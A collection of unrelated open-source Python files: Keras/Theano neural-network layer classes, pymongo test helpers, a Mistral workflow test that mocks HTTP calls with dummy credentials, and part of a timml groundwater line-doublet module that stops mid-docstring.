def get_config(self):
return {"name": self.__class__.__name__,
"input_dim": self.input_dim,
"output_dim": self.output_dim,
"init": self.init.__name__,
"activation": self.activation.__name__,
"W_regularizer": self.W_regularizer.get_config() if self.W_regularizer else None,
"b_regularizer": self.b_regularizer.get_config() if self.b_regularizer else None,
"activity_regularizer": self.activity_regularizer.get_config() if self.activity_regularizer else None,
"W_constraint": self.W_constraint.get_config() if self.W_constraint else None,
"b_constraint": self.b_constraint.get_config() if self.b_constraint else None}
class ActivityRegularization(Layer):
'''
Layer that passes through its input unchanged, but applies an update
to the cost function based on the activity.
'''
def __init__(self, l1=0., l2=0.):
super(ActivityRegularization, self).__init__()
self.l1 = l1
self.l2 = l2
activity_regularizer = ActivityRegularizer(l1=l1, l2=l2)
activity_regularizer.set_layer(self)
self.regularizers = [activity_regularizer]
def get_output(self, train=False):
return self.get_input(train)
def get_config(self):
return {"name": self.__class__.__name__,
"l1": self.l1,
"l2": self.l2}
class TimeDistributedDense(MaskedLayer):
'''
Apply a same DenseLayer for each dimension[1] (shared_dimension) input
Especially useful after a recurrent network with 'return_sequence=True'
Tensor input dimensions: (nb_sample, shared_dimension, input_dim)
Tensor output dimensions: (nb_sample, shared_dimension, output_dim)
'''
def __init__(self, input_dim, output_dim, init='glorot_uniform', activation='linear', weights=None,
W_regularizer=None, b_regularizer=None, activity_regularizer=None,
W_constraint=None, b_constraint=None):
super(TimeDistributedDense, self).__init__()
self.init = initializations.get(init)
self.activation = activations.get(activation)
self.input_dim = input_dim
self.output_dim = output_dim
self.input = T.tensor3()
self.W = self.init((self.input_dim, self.output_dim))
self.b = shared_zeros((self.output_dim))
self.params = [self.W, self.b]
self.regularizers = []
self.W_regularizer = regularizers.get(W_regularizer)
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
if self.activity_regularizer:
self.activity_regularizer.set_layer(self)
self.regularizers.append(self.activity_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.b_constraint = constraints.get(b_constraint)
self.constraints = [self.W_constraint, self.b_constraint]
if weights is not None:
self.set_weights(weights)
def get_output(self, train=False):
X = self.get_input(train)
output = self.activation(T.dot(X.dimshuffle(1, 0, 2), self.W) + self.b)
return output.dimshuffle(1, 0, 2)
def get_config(self):
return {"name": self.__class__.__name__,
"input_dim": self.input_dim,
"output_dim": self.output_dim,
"init": self.init.__name__,
"activation": self.activation.__name__,
"W_regularizer": self.W_regularizer.get_config() if self.W_regularizer else None,
"b_regularizer": self.b_regularizer.get_config() if self.b_regularizer else None,
"activity_regularizer": self.activity_regularizer.get_config() if self.activity_regularizer else None,
"W_constraint": self.W_constraint.get_config() if self.W_constraint else None,
"b_constraint": self.b_constraint.get_config() if self.b_constraint else None}
class AutoEncoder(Layer):
'''
A customizable autoencoder model.
If output_reconstruction then dim(input) = dim(output)
else dim(output) = dim(hidden)
'''
def __init__(self, encoder, decoder, output_reconstruction=True, weights=None):
super(AutoEncoder, self).__init__()
self.output_reconstruction = output_reconstruction
self.encoder = encoder
self.decoder = decoder
self.decoder.set_previous(self.encoder)
self.params = []
self.regularizers = []
self.constraints = []
self.updates = []
for layer in [self.encoder, self.decoder]:
params, regularizers, constraints, updates = layer.get_params()
self.regularizers += regularizers
self.updates += updates
for p, c in zip(params, constraints):
if p not in self.params:
self.params.append(p)
self.constraints.append(c)
if weights is not None:
self.set_weights(weights)
def set_previous(self, node):
self.encoder.set_previous(node)
def get_weights(self):
weights = []
for layer in [self.encoder, self.decoder]:
weights += layer.get_weights()
return weights
def set_weights(self, weights):
nb_param = len(self.encoder.params)
self.encoder.set_weights(weights[:nb_param])
self.decoder.set_weights(weights[nb_param:])
def get_input(self, train=False):
return self.encoder.get_input(train)
@property
def input(self):
return self.encoder.input
def _get_hidden(self, train=False):
return self.encoder.get_output(train)
def get_output(self, train=False):
if not train and not self.output_reconstruction:
return self.encoder.get_output(train)
return self.decoder.get_output(train)
def get_config(self):
return {"name": self.__class__.__name__,
"encoder_config": self.encoder.get_config(),
"decoder_config": self.decoder.get_config(),
"output_reconstruction": self.output_reconstruction}
class MaxoutDense(Layer):
'''
Max-out layer, nb_feature is the number of pieces in the piecewise linear approx.
Refer to http://arxiv.org/pdf/1302.4389.pdf
'''
def __init__(self, input_dim, output_dim, nb_feature=4, init='glorot_uniform', weights=None,
W_regularizer=None, b_regularizer=None, activity_regularizer=None,
W_constraint=None, b_constraint=None):
super(MaxoutDense, self).__init__()
self.init = initializations.get(init)
self.input_dim = input_dim
self.output_dim = output_dim
self.nb_feature = nb_feature
self.input = T.matrix()
self.W = self.init((self.nb_feature, self.input_dim, self.output_dim))
self.b = shared_zeros((self.nb_feature, self.output_dim))
self.params = [self.W, self.b]
self.regularizers = []
self.W_regularizer = regularizers.get(W_regularizer)
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
if self.activity_regularizer:
self.activity_regularizer.set_layer(self)
self.regularizers.append(self.activity_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.b_constraint = constraints.get(b_constraint)
self.constraints = [self.W_constraint, self.b_constraint]
if weights is not None:
self.set_weights(weights)
def get_output(self, train=False):
X = self.get_input(train)
# -- don't need activation since it's just linear.
output = T.max(T.dot(X, self.W) + self.b, axis=1)
return output
def get_config(self):
return {"name": self.__class__.__name__,
"input_dim": self.input_dim,
"output_dim": self.output_dim,
"init": self.init.__name__,
"nb_feature": self.nb_feature,
"W_regularizer": self.W_regularizer.get_config() if self.W_regularizer else None,
"b_regularizer": self.b_regularizer.get_config() if self.b_regularizer else None,
"activity_regularizer": self.activity_regularizer.get_config() if self.activity_regularizer else None,
"W_constraint": self.W_constraint.get_config() if self.W_constraint else None,
"b_constraint": self.b_constraint.get_config() if self.b_constraint else None}
| |
# Copyright 2012-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for testing pymongo
"""
import contextlib
import os
import struct
import sys
import threading
import time
import warnings
from functools import partial
from pymongo import MongoClient
from pymongo.errors import AutoReconnect, OperationFailure
from pymongo.server_selectors import (any_server_selector,
writable_server_selector)
from pymongo.write_concern import WriteConcern
from test import (client_context,
db_user,
db_pwd,
host,
port)
from test.version import Version
def _connection_string_noauth(h, p):
if h.startswith("mongodb://"):
return h
return "mongodb://%s:%d" % (h, p)
def _connection_string(h, p):
if h.startswith("mongodb://"):
return h
elif client_context.auth_enabled:
return "mongodb://%s:%s@%s:%d" % (db_user, db_pwd, h, p)
else:
return _connection_string_noauth(h, p)
def single_client_noauth(h=host, p=port, **kwargs):
"""Make a direct connection. Don't authenticate."""
return MongoClient(_connection_string_noauth(h, p), **kwargs)
def single_client(h=host, p=port, **kwargs):
"""Make a direct connection, and authenticate if necessary."""
return MongoClient(_connection_string(h, p), **kwargs)
def rs_client_noauth(h=host, p=port, **kwargs):
"""Connect to the replica set. Don't authenticate."""
return MongoClient(_connection_string_noauth(h, p),
replicaSet=client_context.replica_set_name, **kwargs)
def rs_client(h=host, p=port, **kwargs):
"""Connect to the replica set and authenticate if necessary."""
return MongoClient(_connection_string(h, p),
replicaSet=client_context.replica_set_name, **kwargs)
def rs_or_single_client_noauth(h=host, p=port, **kwargs):
"""Connect to the replica set if there is one, otherwise the standalone.
Like rs_or_single_client, but does not authenticate.
"""
if client_context.replica_set_name:
return rs_client_noauth(h, p, **kwargs)
else:
return single_client_noauth(h, p, **kwargs)
def rs_or_single_client(h=host, p=port, **kwargs):
"""Connect to the replica set if there is one, otherwise the standalone.
Authenticates if necessary.
"""
if client_context.replica_set_name:
return rs_client(h, p, **kwargs)
else:
return single_client(h, p, **kwargs)
def one(s):
"""Get one element of a set"""
return next(iter(s))
def oid_generated_on_client(oid):
"""Is this process's PID in this ObjectId?"""
pid_from_doc = struct.unpack(">H", oid.binary[7:9])[0]
return (os.getpid() % 0xFFFF) == pid_from_doc
def delay(sec):
return '''function() { sleep(%f * 1000); return true; }''' % sec
def get_command_line(client):
command_line = client.admin.command('getCmdLineOpts')
assert command_line['ok'] == 1, "getCmdLineOpts() failed"
return command_line
def server_started_with_option(client, cmdline_opt, config_opt):
"""Check if the server was started with a particular option.
:Parameters:
- `cmdline_opt`: The command line option (i.e. --nojournal)
- `config_opt`: The config file option (i.e. nojournal)
"""
command_line = get_command_line(client)
if 'parsed' in command_line:
parsed = command_line['parsed']
if config_opt in parsed:
return parsed[config_opt]
argv = command_line['argv']
return cmdline_opt in argv
def server_started_with_auth(client):
try:
command_line = get_command_line(client)
except OperationFailure as e:
msg = e.details.get('errmsg', '')
if e.code == 13 or 'unauthorized' in msg or 'login' in msg:
# Unauthorized.
return True
raise
# MongoDB >= 2.0
if 'parsed' in command_line:
parsed = command_line['parsed']
# MongoDB >= 2.6
if 'security' in parsed:
security = parsed['security']
# >= rc3
if 'authorization' in security:
return security['authorization'] == 'enabled'
# < rc3
return security.get('auth', False) or bool(security.get('keyFile'))
return parsed.get('auth', False) or bool(parsed.get('keyFile'))
# Legacy
argv = command_line['argv']
return '--auth' in argv or '--keyFile' in argv
def server_started_with_nojournal(client):
command_line = get_command_line(client)
# MongoDB 2.6.
if 'parsed' in command_line:
parsed = command_line['parsed']
if 'storage' in parsed:
storage = parsed['storage']
if 'journal' in storage:
return not storage['journal']['enabled']
return server_started_with_option(client, '--nojournal', 'nojournal')
def server_is_master_with_slave(client):
command_line = get_command_line(client)
if 'parsed' in command_line:
return command_line['parsed'].get('master', False)
return '--master' in command_line['argv']
def drop_collections(db):
for coll in db.collection_names():
if not coll.startswith('system'):
db.drop_collection(coll)
def remove_all_users(db):
if Version.from_client(db.client).at_least(2, 5, 3, -1):
db.command("dropAllUsersFromDatabase", 1,
writeConcern={"w": client_context.w})
else:
db = db.client.get_database(
db.name, write_concern=WriteConcern(w=client_context.w))
db.system.users.delete_many({})
def joinall(threads):
"""Join threads with a 5-minute timeout, assert joins succeeded"""
for t in threads:
t.join(300)
assert not t.isAlive(), "Thread %s hung" % t
def connected(client):
"""Convenience to wait for a newly-constructed client to connect."""
with warnings.catch_warnings():
# Ignore warning that "ismaster" is always routed to primary even
# if client's read preference isn't PRIMARY.
warnings.simplefilter("ignore", UserWarning)
client.admin.command('ismaster') # Force connection.
return client
def wait_until(predicate, success_description, timeout=10):
"""Wait up to 10 seconds (by default) for predicate to be true.
E.g.:
wait_until(lambda: client.primary == ('a', 1),
'connect to the primary')
If the lambda-expression isn't true after 10 seconds, we raise
AssertionError("Didn't ever connect to the primary").
Returns the predicate's first true value.
"""
start = time.time()
while True:
retval = predicate()
if retval:
return retval
if time.time() - start > timeout:
raise AssertionError("Didn't ever %s" % success_description)
time.sleep(0.1)
def is_mongos(client):
res = client.admin.command('ismaster')
return res.get('msg', '') == 'isdbgrid'
def enable_text_search(client):
client.admin.command(
'setParameter', textSearchEnabled=True)
for host, port in client.secondaries:
client = MongoClient(host, port)
if client_context.auth_enabled:
client.admin.authenticate(db_user, db_pwd)
client.admin.command('setParameter', textSearchEnabled=True)
def assertRaisesExactly(cls, fn, *args, **kwargs):
"""
Unlike the standard assertRaises, this checks that a function raises a
specific class of exception, and not a subclass. E.g., check that
MongoClient() raises ConnectionFailure but not its subclass, AutoReconnect.
"""
try:
fn(*args, **kwargs)
except Exception as e:
assert e.__class__ == cls, "got %s, expected %s" % (
e.__class__.__name__, cls.__name__)
else:
raise AssertionError("%s not raised" % cls)
@contextlib.contextmanager
def ignore_deprecations():
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
yield
def read_from_which_host(
client,
pref,
tag_sets=None,
):
"""Read from a client with the given Read Preference.
Return the 'host:port' which was read from.
:Parameters:
- `client`: A MongoClient
- `mode`: A ReadPreference
- `tag_sets`: List of dicts of tags for data-center-aware reads
"""
db = client.pymongo_test
if isinstance(tag_sets, dict):
tag_sets = [tag_sets]
if tag_sets:
tags = tag_sets or pref.tag_sets
pref = pref.__class__(tags)
db.read_preference = pref
cursor = db.test.find()
try:
try:
next(cursor)
except StopIteration:
# No documents in collection, that's fine
pass
return cursor.address
except AutoReconnect:
return None
def assertReadFrom(testcase, client, member, *args, **kwargs):
"""Check that a query with the given mode and tag_sets reads from
the expected replica-set member.
:Parameters:
- `testcase`: A unittest.TestCase
- `client`: A MongoClient
- `member`: A host:port expected to be used
- `mode`: A ReadPreference
- `tag_sets` (optional): List of dicts of tags for data-center-aware reads
"""
for _ in range(10):
testcase.assertEqual(member,
read_from_which_host(client, *args, **kwargs))
def assertReadFromAll(testcase, client, members, *args, **kwargs):
"""Check that a query with the given mode and tag_sets reads from all
members in a set, and only members in that set.
:Parameters:
- `testcase`: A unittest.TestCase
- `client`: A MongoClient
- `members`: Sequence of host:port expected to be used
- `mode`: A ReadPreference
- `tag_sets` (optional): List of dicts of tags for data-center-aware reads
"""
members = set(members)
used = set()
for _ in range(100):
used.add(read_from_which_host(client, *args, **kwargs))
testcase.assertEqual(members, used)
def get_pool(client):
"""Get the standalone, primary, or mongos pool."""
topology = client._get_topology()
server = topology.select_server(writable_server_selector)
return server.pool
def get_pools(client):
"""Get all pools."""
return [
server.pool for server in
client._get_topology().select_servers(any_server_selector)]
# Constants for run_threads and lazy_client_trial.
NTRIALS = 5
NTHREADS = 10
def run_threads(collection, target):
"""Run a target function in many threads.
target is a function taking a Collection and an integer.
"""
threads = []
for i in range(NTHREADS):
bound_target = partial(target, collection, i)
threads.append(threading.Thread(target=bound_target))
for t in threads:
t.start()
for t in threads:
t.join(30)
assert not t.isAlive()
@contextlib.contextmanager
def frequent_thread_switches():
"""Make concurrency bugs more likely to manifest."""
interval = None
if not sys.platform.startswith('java'):
if hasattr(sys, 'getswitchinterval'):
interval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
else:
interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
yield
finally:
if not sys.platform.startswith('java'):
if hasattr(sys, 'setswitchinterval'):
sys.setswitchinterval(interval)
else:
sys.setcheckinterval(interval)
def lazy_client_trial(reset, target, test, get_client):
"""Test concurrent operations on a lazily-connecting client.
`reset` takes a collection and resets it for the next trial.
`target` takes a lazily-connecting collection and an index from
0 to NTHREADS, and performs some operation, e.g. an insert.
`test` takes the lazily-connecting collection and asserts a
post-condition to prove `target` succeeded.
"""
collection = client_context.client.pymongo_test.test
with frequent_thread_switches():
for i in range(NTRIALS):
reset(collection)
lazy_client = get_client()
lazy_collection = lazy_client.pymongo_test.test
run_threads(lazy_collection, target)
test(lazy_collection)
| |
# Copyright 2015 - StackStorm, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_config import cfg
from oslo_log import log as logging
import requests
import testtools
from mistral.actions import std_actions
from mistral.db.v2 import api as db_api
from mistral.services import workflows as wf_service
from mistral.tests import base as test_base
from mistral.tests.unit.engine import base
from mistral.workflow import states
LOG = logging.getLogger(__name__)
# Use the set_default method to set value otherwise in certain test cases
# the change in value is not permanent.
cfg.CONF.set_default('auth_enable', False, group='pecan')
ENV = {
'__actions': {
'std.http': {
'auth': 'librarian:password123',
'timeout': 30,
}
}
}
EXPECTED_ENV_AUTH = ('librarian', 'password123')
WORKFLOW1 = """
---
version: "2.0"
wf1:
type: direct
tasks:
task1:
action: std.http url="https://api.library.org/books"
publish:
result: <% $ %>
"""
WORKFLOW2 = """
---
version: "2.0"
wf2:
type: direct
tasks:
task1:
action: std.http url="https://api.library.org/books" timeout=60
publish:
result: <% $ %>
"""
WORKFLOW1_WITH_ITEMS = """
---
version: "2.0"
wf1_with_items:
type: direct
input:
- links
tasks:
task1:
with-items: link in <% $.links %>
action: std.http url=<% $.link %>
publish:
result: <% $ %>
"""
WORKFLOW2_WITH_ITEMS = """
---
version: "2.0"
wf2_with_items:
type: direct
input:
- links
tasks:
task1:
with-items: link in <% $.links %>
action: std.http url=<% $.link %> timeout=60
publish:
result: <% $ %>
"""
class ActionDefaultTest(base.EngineTestCase):
@mock.patch.object(
requests, 'request',
mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
@mock.patch.object(
std_actions.HTTPAction, 'is_sync',
mock.MagicMock(return_value=True))
def test_action_defaults_from_env(self):
wf_service.create_workflows(WORKFLOW1)
wf_ex = self.engine.start_workflow('wf1', None, env=ENV)
self._await(lambda: self.is_execution_success(wf_ex.id))
wf_ex = db_api.get_workflow_execution(wf_ex.id)
self.assertEqual(states.SUCCESS, wf_ex.state)
self._assert_single_item(wf_ex.task_executions, name='task1')
requests.request.assert_called_with(
'GET', 'https://api.library.org/books',
params=None, data=None, headers=None, cookies=None,
allow_redirects=None, proxies=None, verify=None,
auth=EXPECTED_ENV_AUTH,
timeout=ENV['__actions']['std.http']['timeout'])
@mock.patch.object(
requests, 'request',
mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
@mock.patch.object(
std_actions.HTTPAction, 'is_sync',
mock.MagicMock(return_value=True))
def test_action_defaults_from_env_not_applied(self):
wf_service.create_workflows(WORKFLOW2)
wf_ex = self.engine.start_workflow('wf2', None, env=ENV)
self._await(lambda: self.is_execution_success(wf_ex.id))
wf_ex = db_api.get_workflow_execution(wf_ex.id)
self.assertEqual(states.SUCCESS, wf_ex.state)
self._assert_single_item(wf_ex.task_executions, name='task1')
requests.request.assert_called_with(
'GET', 'https://api.library.org/books',
params=None, data=None, headers=None, cookies=None,
allow_redirects=None, proxies=None, verify=None,
auth=EXPECTED_ENV_AUTH,
timeout=60
)
@mock.patch.object(
requests, 'request',
mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
@mock.patch.object(
std_actions.HTTPAction, 'is_sync',
mock.MagicMock(return_value=True))
@testtools.skip("Fix 'with-items'.")
def test_with_items_action_defaults_from_env(self):
wf_service.create_workflows(WORKFLOW1_WITH_ITEMS)
wf_input = {
'links': [
'https://api.library.org/books',
'https://api.library.org/authors'
]
}
wf_ex = self.engine.start_workflow(
'wf1_with_items',
wf_input,
env=ENV
)
self._await(lambda: self.is_execution_success(wf_ex.id))
wf_ex = db_api.get_workflow_execution(wf_ex.id)
self.assertEqual(states.SUCCESS, wf_ex.state)
self._assert_single_item(wf_ex.task_executions, name='task1')
calls = [mock.call('GET', url, params=None, data=None,
headers=None, cookies=None,
allow_redirects=None, proxies=None,
auth=EXPECTED_ENV_AUTH, verify=None,
timeout=ENV['__actions']['std.http']['timeout'])
for url in wf_input['links']]
requests.request.assert_has_calls(calls, any_order=True)
@mock.patch.object(
requests, 'request',
mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
@mock.patch.object(
std_actions.HTTPAction, 'is_sync',
mock.MagicMock(return_value=True))
@testtools.skip("Fix 'with-items'.")
def test_with_items_action_defaults_from_env_not_applied(self):
wf_service.create_workflows(WORKFLOW2_WITH_ITEMS)
wf_input = {
'links': [
'https://api.library.org/books',
'https://api.library.org/authors'
]
}
wf_ex = self.engine.start_workflow(
'wf2_with_items',
wf_input,
env=ENV
)
self._await(lambda: self.is_execution_success(wf_ex.id))
wf_ex = db_api.get_workflow_execution(wf_ex.id)
self.assertEqual(states.SUCCESS, wf_ex.state)
self._assert_single_item(wf_ex.task_executions, name='task1')
calls = [mock.call('GET', url, params=None, data=None,
headers=None, cookies=None,
allow_redirects=None, proxies=None,
auth=EXPECTED_ENV_AUTH, verify=None,
timeout=60)
for url in wf_input['links']]
requests.request.assert_has_calls(calls, any_order=True)
| |
import numpy as np
import matplotlib.pyplot as plt
import inspect # Used for storing the input
from .element import Element
from .besselaesnumba import besselaesnumba
besselaesnumba.initialize()
try:
from .src import besselaesnew
besselaesnew.besselaesnew.initialize()
#print('succes on f2py')
except:
pass
from .controlpoints import controlpoints
from .equation import DisvecEquation, LeakyWallEquation
__all__ = ['ImpLineDoublet', 'ImpLineDoubletString', 'LeakyLineDoublet',
'LeakyLineDoubletString']
class LineDoubletHoBase(Element):
def __init__(self, model, x1=-1, y1=0, x2=1, y2=0, delp=0.0, res=0.0,
layers=0, order=0, name='LineDoubletHoBase',
label=None, addtomodel=True, aq=None, zcinout=None):
Element.__init__(self, model, nparam=1, nunknowns=0, layers=layers,
name=name, label=label)
self.x1 = float(x1)
self.y1 = float(y1)
self.x2 = float(x2)
self.y2 = float(y2)
self.delp = np.atleast_1d(delp).astype('d')
self.res = np.atleast_1d(res).astype('d')
self.order = order
self.nparam = self.nlayers * (self.order + 1)
self.addtomodel = addtomodel
if addtomodel: self.model.add_element(self)
self.aq = aq
self.zcinout = zcinout
if self.model.f2py:
self.bessel = besselaesnew.besselaesnew
else:
self.bessel = besselaesnumba
def __repr__(self):
return self.name + ' from ' + str((self.x1, self.y1)) + ' to ' + str(
(self.x2, self.y2))
def initialize(self):
self.ncp = self.order + 1
self.z1 = self.x1 + 1j * self.y1
self.z2 = self.x2 + 1j * self.y2
self.L = np.abs(self.z1 - self.z2)
self.thetaNormOut = np.arctan2(self.y2 - self.y1,
self.x2 - self.x1) - np.pi / 2.0
self.cosnorm = np.cos(self.thetaNormOut) * np.ones(self.ncp)
self.sinnorm = np.sin(self.thetaNormOut) * np.ones(self.ncp)
#
self.xc, self.yc = controlpoints(self.ncp, self.z1, self.z2, eps=0)
if self.zcinout is not None:
self.xcin, self.ycin = controlpoints(self.ncp, self.zcinout[0],
self.zcinout[1], eps=0)
self.xcout, self.ycout = controlpoints(self.ncp, self.zcinout[2],
self.zcinout[3], eps=0)
else:
self.xcin, self.ycin = controlpoints(self.ncp, self.z1, self.z2,
eps=1e-6)
self.xcout, self.ycout = controlpoints(self.ncp, self.z1, self.z2,
eps=-1e-6)
if self.aq is None:
self.aq = self.model.aq.find_aquifer_data(self.xc[0], self.yc[0])
self.resfac = self.aq.T[self.layers] / self.res
if self.addtomodel:
self.aq.add_element(self)
self.parameters = np.empty((self.nparam, 1))
# Not sure if this needs to be here
self.parameters[:, 0] = self.delp
def potinf(self, x, y, aq=None):
'''Can be called with only one x,y value
Returns array(nparam, self.aq.naq) with order
order 0, layer[0]
order 0, layer[1]
...
order 1, layer[0]
order 1, layer[1]
etc
'''
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((self.nparam, aq.naq))
if aq == self.aq:
potrv = rv.reshape((self.order + 1, self.nlayers,
aq.naq)) # clever way of using a reshaped rv here
pot = np.zeros((self.order + 1, aq.naq))
pot[:, :] = self.bessel.potbesldv(float(x), float(y), self.z1, self.z2, aq.lab,
self.order, aq.ilap, aq.naq)
potrv[:] = self.aq.coef[self.layers] * pot[:, np.newaxis, :]
return rv
def disvecinf(self, x, y, aq=None):
'''Can be called with only one x,y value
Returns array(nparam, self.aq.naq) with order
order 0, layer[0]
order 0, layer[1]
...
order 1, layer[0]
order 1, layer[1]
etc
'''
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((2, self.nparam, aq.naq))
if aq == self.aq:
qxqyrv = rv.reshape((2, self.order + 1, self.nlayers,
aq.naq)) # clever way of using a reshaped rv here
qxqy = np.zeros((2 * (self.order + 1), aq.naq))
qxqy[:, :] = self.bessel.disbesldv(float(x), float(y), self.z1, self.z2, aq.lab,
self.order, aq.ilap, aq.naq)
qxqyrv[0, :] = self.aq.coef[self.layers] * qxqy[:self.order + 1,
np.newaxis, :]
qxqyrv[1, :] = self.aq.coef[self.layers] * qxqy[self.order + 1:,
np.newaxis, :]
return rv
def plot(self, layer=None):
if (layer is None) or (layer in self.layers):
plt.plot([self.x1, self.x2], [self.y1, self.y2], 'k')
class ImpLineDoublet(LineDoubletHoBase, DisvecEquation):
"""
Create a segment of an impermeable wall, which is
simulated with a line-doublet
Parameters
----------
model : Model object
Model to which the element is added
x1 : scalar
x-coordinate of fist point of line-doublet
y1 : scalar
y-coordinate of fist point of line-doublet
x2 : scalar
x-coordinate of second point of line-doublet
y2 : scalar
y-coordinate of second point of line-doublet
order : int (default is 0)
polynomial order of potential jump along line-doublet
(head jump if transmissivity is equal on each side of wall)
layers : scalar, list or array
layer(s) in which element is placed
if scalar: element is placed in this layer
if list or array: element is placed in all these layers
label: str or None
label of element
See Also
--------
:class:`.ImpLineDoubletString`
"""
def __init__(self, model, x1=-1, y1=0, x2=1, y2=0, \
order=0, layers=0, label=None, addtomodel=True):
self.storeinput(inspect.currentframe())
LineDoubletHoBase.__init__(self, model, x1, y1, x2, y2, delp=0, \
res = np.inf, layers=layers, order=order,
name='ImpLineDoublet', label=label, \
addtomodel=addtomodel)
self.nunknowns = self.nparam
def initialize(self):
LineDoubletHoBase.initialize(self)
def setparams(self, sol):
self.parameters[:, 0] = sol
class LeakyLineDoublet(LineDoubletHoBase, LeakyWallEquation):
"""
Create a segment of a leaky wall, which is
simulated with a line-doublet. The specific discharge through
the wall is equal to the head difference across the wall
divided by the resistance of the wall.
Parameters
----------
model : Model object
Model to which the element is added
x1 : scalar
x-coordinate of fist point of line-doublet
y1 : scalar
y-coordinate of fist point of line-doublet
x2 : scalar
x-coordinate of second point of line-doublet
y2 : scalar
y-coordinate of second point of line-doublet
res : scalar
resistance of leaky wall
order : int (default is 0)
polynomial order of potential jump along line-doublet
(head jump if transmissivity is equal on each side of wall)
layers : scalar, list or array
layer(s) in which element is placed
if scalar: element is placed in this layer
if list or array: element is placed in all these layers
label: str or None
label of element
See Also
--------
:class:`.LeakyLineDoubletString`
"""
def __init__(self, model, x1=-1, y1=0, x2=1, y2=0, res=0,\
order=0, layers=0, label=None, addtomodel=True):
self.storeinput(inspect.currentframe())
LineDoubletHoBase.__init__(self, model, x1, y1, x2, y2, delp=0, \
res=res, layers=layers, order=order,
name='ImpLineDoublet', label=label, \
addtomodel=addtomodel)
self.nunknowns = self.nparam
def initialize(self):
LineDoubletHoBase.initialize(self)
def setparams(self, sol):
self.parameters[:, 0] = sol
class LineDoubletStringBase(Element):
def __init__(self, model, xy, closed=False, layers=0, order=0, res=0,
name='LineDoubletStringBase', label=None, aq=None):
Element.__init__(self, model, nparam=1, nunknowns=0, layers=layers, \
name=name, label=label)
self.xy = np.atleast_2d(xy).astype('d')
if closed: self.xy = np.vstack((self.xy, self.xy[0]))
self.order = order
self.aq = aq
self.ldlist = []
self.x, self.y = self.xy[:, 0], self.xy[:, 1]
self.Nld = len(self.x) - 1
for i in range(self.Nld):
self.ldlist.append(
LineDoubletHoBase(model, x1=self.x[i], y1=self.y[i], x2=self.x[i + 1],
y2=self.y[i + 1], delp=0.0, res=res, layers=layers,
order=order, label=label, addtomodel=False, aq=aq))
def __repr__(self):
return self.name + ' with nodes ' + str(self.xy)
def initialize(self):
for ld in self.ldlist:
ld.initialize()
self.ncp = self.Nld * self.ldlist[
0].ncp # Same order for all elements in string
self.nparam = self.Nld * self.ldlist[0].nparam
self.nunknowns = self.nparam
self.xld = np.empty((self.Nld, 2))
self.yld = np.empty((self.Nld, 2))
for i, ld in enumerate(self.ldlist):
self.xld[i, :] = [ld.x1, ld.x2]
self.yld[i, :] = [ld.y1, ld.y2]
if self.aq is None:
self.aq = self.model.aq.find_aquifer_data(self.ldlist[0].xc[0],
self.ldlist[0].yc[0])
self.parameters = np.zeros((self.nparam, 1))
## As parameters are only stored for the element not the list, we need to combine the following
self.xc = np.array([ld.xc for ld in self.ldlist]).flatten()
self.yc = np.array([ld.yc for ld in self.ldlist]).flatten()
self.xcin = np.array([ld.xcin for ld in self.ldlist]).flatten()
self.ycin = np.array([ld.ycin for ld in self.ldlist]).flatten()
self.xcout = np.array([ld.xcout for ld in self.ldlist]).flatten()
self.ycout = np.array([ld.ycout for ld in self.ldlist]).flatten()
self.cosnorm = np.array([ld.cosnorm for ld in self.ldlist]).flatten()
self.sinnorm = np.array([ld.sinnorm for ld in self.ldlist]).flatten()
self.aqin = self.model.aq.find_aquifer_data(self.xcin[0], self.ycin[0])
self.aqout = self.model.aq.find_aquifer_data(self.xcout[0],
self.ycout[0])
self.resfac = self.ldlist[0].resfac
def potinf(self, x, y, aq=None):
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((self.Nld, self.ldlist[0].nparam, aq.naq))
for i in range(self.Nld):
rv[i] = self.ldlist[i].potinf(x, y, aq)
rv.shape = (self.nparam, aq.naq)
return rv
def disvecinf(self, x, y, aq=None):
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((2, self.Nld, self.ldlist[0].nparam, aq.naq))
for i in range(self.Nld):
rv[:, i] = self.ldlist[i].disvecinf(x, y, aq)
rv.shape = (2, self.nparam, aq.naq)
return rv
def plot(self, layer=None):
if (layer is None) or (layer in self.layers):
plt.plot(self.x, self.y, 'k')
class ImpLineDoubletString(LineDoubletStringBase, DisvecEquation):
"""
Create a string of impermeable wall segements consisting
of line-doublets
Parameters
----------
model : Model object
Model to which the element is added
xy : array or list
